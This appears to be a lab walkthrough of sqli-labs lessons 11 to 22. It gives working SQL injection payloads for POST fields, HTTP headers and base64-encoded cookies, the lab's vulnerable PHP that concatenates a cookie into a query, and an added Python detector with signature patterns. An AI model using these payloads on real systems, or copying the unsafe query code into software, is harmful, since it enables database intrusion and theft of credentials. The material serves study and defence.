SQL Injection: Conventional POST-Type Injection

Time: 2022-10-27 12:05:14

less11: single-quote string injection

Injection: test' or 1=1 #&password=test

SQL statement: select username, password from users where username='test' or 1=1 #' and password='test' limit 0,1;

Injection: uname=test&passwd=test' or '1'='1

SQL statement: select username,password from users where username='test' and password='test' or '1'='1' limit 0,1;

less12: double-quote string injection variant (quote plus closing parenthesis)

Injection: uname=a&passwd=a") or 1=1#

less13: single-quote variant, double-query injection

Injection: uname=a&passwd=a') or ('1')=('1

less14: single-quote double-query injection

Injection: uname=a&passwd=a' or '1'='1

less15: single-quote blind injection

Injection: uname=a&passwd=a' or 1=1#

Time-based probe: uname=a&passwd=a') or if(length(database())>7,1,sleep(7))#

less16: double-quote blind injection

Injection: uname=a&passwd=a") or if(length(database())>7,1,sleep(5))#

less17: UPDATE-query POST injection

Filter function: check_input()

Injections (error-based, leaking data through the XPath error raised by updatexml()):

Get current database: uname=admin&passwd=a' or updatexml(1,concat(0x282b5d,database()),1)#

Get current user: uname=admin&passwd=a' or updatexml(1,concat(0x282b5d,(select user())),1)#

Get table names: uname=admin&passwd=a' or updatexml(1,concat(0x282b5d,(select table_name from information_schema.tables where table_schema=0x7365 limit 0,1)),1)#

Get column names: uname=admin&passwd=a' or updatexml(1,concat(0x282b5d,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)),1)#

Read data: uname=admin&passwd=a' or updatexml(1,concat(0x282b5d,(select password from users where username='admin')),1)#

less18: header-based User-Agent injection, using the Firefox add-on Live HTTP Headers as the proxy tool

Injection: User-Agent: Mozilla/5.0 .. Firefox/46.0 or updatexml(0,concat(0x2b5e,database()),0),",")#

User-Agent: Mozilla/5.0 .. Firefox/46.0 or updatexml(0,concat(0x2b5e,(select email_id from emails limit 0,1)),0),",")#

less19: header-based Referer injection

Injection: ' or extractvalue(1,concat(0x2b,version())),")#

(extractvalue() takes only two arguments; updatexml() takes three.)

' or extractvalue(1,concat(0x2b,(select email_id from emails limit 0,1))),")#

less20: header-based Cookie injection

When no cookie is present, the cookie is set; source:

$uname=check_input($_POST['uname']);
$passwd=check_input($_POST['passwd']);
$sql="select users.username,users.password from users where users.username=$uname and users.password=$passwd order by users.id desc limit 0,1";
$result=mysql_query($sql);
$row=mysql_fetch_array($result);
$cookee=$row['username'];   // the username from the database is stored in the cookie as-is
if($row){
    setcookie('uname', $cookee, time()+3600);
    header('Location: index.php');
}

When the cookie exists, source:

$cookee=$_COOKIE['uname'];
$sql="select * from users where username='$cookee' limit 0,1";   // cookie value is concatenated into the query without check_input()
$result=mysql_query($sql);
$row=mysql_fetch_array($result);

If the delete-cookie button is pressed, the back end sets the expiry to a time in the past, which deletes the cookie:

setcookie('uname',$row['username'],time()-3600);
header('Location:index.php');

Injection: Cookie:uname=admin'

Cookie:uname=admin' order by 4#

Cookie:uname=' union select 1,2,email_id from emails#

Cookie:uname=' union select 1,2,email_id from emails limit 1,1#

less21: single-quote string variant Cookie injection

Source:

$cookee=base64_decode($cookee);
$sql="select * from users where username=('$cookee') limit 0,1";

Injection: Cookie:uname=') union select 1,2,email_id from emails#   // base64-encoded

less22: double-quote string Cookie injection

Injection: Cookie:uname=" union select 1,2,email_id from emails#   // base64-encoded
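A server-side check covering the injection points this page walks through (POST fields, User-Agent, Referer, and the plain or base64-encoded cookies of less20 to less22). This Python is an added example, not code from the original post or from sqli-labs: the signature list, scan_request(), cookie_candidates() and the sample payloads are constructed for illustration, and the cookie is base64-decoded the same way the less21 source does before being inspected.

```python
import base64
import re
from urllib.parse import parse_qsl

# Signatures for the techniques this page walks through: XPath-error leaks via
# updatexml()/extractvalue(), sleep()-based blind probes, or-1=1 style
# tautologies, and UNION SELECT extraction (constructed for this example).
PATTERNS = {
    "error_based": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "time_based": re.compile(r"\bsleep\s*\(", re.I),
    "tautology": re.compile(r"""\bor\b\s*\(?\s*['"]?1['"]?\s*\)?\s*=\s*\(?\s*['"]?1""", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
}


def cookie_candidates(value):
    """Return the raw cookie value plus, when it decodes as base64 text,
    the decoded form (less21/22 base64-encode the cookie before use)."""
    candidates = [value]
    try:
        candidates.append(base64.b64decode(value, validate=True).decode("utf-8"))
    except (ValueError, UnicodeDecodeError):
        pass  # not base64, e.g. the plain username cookie of less20
    return candidates


def scan_request(headers, body):
    """Scan one request's POST body fields, headers and cookies.
    headers: dict of header name -> value; body: raw urlencoded POST body.
    Returns a sorted list of (location, technique) findings."""
    sources = [("body:" + k, [v]) for k, v in parse_qsl(body, keep_blank_values=True)]
    for name, value in headers.items():
        if name.lower() != "cookie":
            sources.append(("header:" + name, [value]))
            continue
        for part in value.split(";"):  # Cookie: a=1; b=2
            if "=" in part:
                cname, cval = part.strip().split("=", 1)
                sources.append(("cookie:" + cname, cookie_candidates(cval)))
    findings = set()
    for location, candidates in sources:
        for text in candidates:
            for technique, pattern in PATTERNS.items():
                if pattern.search(text):
                    findings.add((location, technique))
    return sorted(findings)


# Constructed sample: the less21 cookie payload, base64-encoded as the lab expects.
SAMPLE_LESS21_COOKIE = base64.b64encode(b"') union select 1,2,email_id from emails#").decode()
```

Signature matching of this kind only flags the techniques it knows about; the fix for the lab's code is to stop concatenating request data into SQL and use parameterized queries instead.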